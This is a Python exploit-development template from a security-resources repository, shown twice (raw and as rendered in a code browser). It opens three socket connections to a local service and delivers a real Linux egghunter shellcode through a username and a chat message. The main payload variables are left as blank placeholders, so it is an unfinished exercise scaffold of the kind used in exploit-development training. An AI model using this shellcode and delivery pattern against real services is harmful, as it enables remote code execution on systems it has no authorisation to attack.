cyber-security-resources/exploit_development/triple_socket_template.py

#!/usr/bin/python
import os
import socket
import sys
import threading
import struct
import time

HOST="127.0.0.1"
PORT=2501

# Matt Miller Access() egghunter, triggers on "W00TW00T"
egghunter = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
egghunterPayload = ?
msgPayload = ?

# Connect one user
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock1.connect((HOST, PORT))
sock1.send("usr1\r\n")
sock1.recv(1024)
print "Connected first user"

# Connect a second user and message the first with the egg
sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock2.connect((HOST, PORT))
sock2.send("usr2\r\n")
sock2.recv(1024)
time.sleep(1)
print "Connected second user"
sock2.send(msgPayload)
print "Sent msg payload"

# Connect a final user to trigger egghunter in username
sock3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock3.connect((HOST, PORT))
sock3.send(egghunterPayload)
print "Sent egghunter payload"

# Close down
sock3.close()
sock2.close()
sock1.close()
Add files via upload 2022-02-21 11:25:45 -05:00			`#!/usr/bin/python`
			`import os`
			`import socket`
			`import sys`
			`import threading`
			`import struct`
			`import time`

			`HOST="127.0.0.1"`
			`PORT=2501`

			`# Matt Miller Access() egghunter, triggers on "W00TW00T"`
			`egghunter = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"`
			`egghunterPayload = ?`
			`msgPayload = ?`

			`# Connect one user`
			`sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`
			`sock1.connect((HOST, PORT))`
			`sock1.send("usr1\r\n")`
			`sock1.recv(1024)`
			`print "Connected first user"`

			`# Connect a second user and message the first with the egg`
			`sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`
			`sock2.connect((HOST, PORT))`
			`sock2.send("usr2\r\n")`
			`sock2.recv(1024)`
			`time.sleep(1)`
			`print "Connected second user"`
			`sock2.send(msgPayload)`
			`print "Sent msg payload"`

			`# Connect a final user to trigger egghunter in username`
			`sock3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`
			`sock3.connect((HOST, PORT))`
			`sock3.send(egghunterPayload)`
			`print "Sent egghunter payload"`

			`# Close down`
			`sock3.close()`
			`sock2.close()`
			`sock1.close()`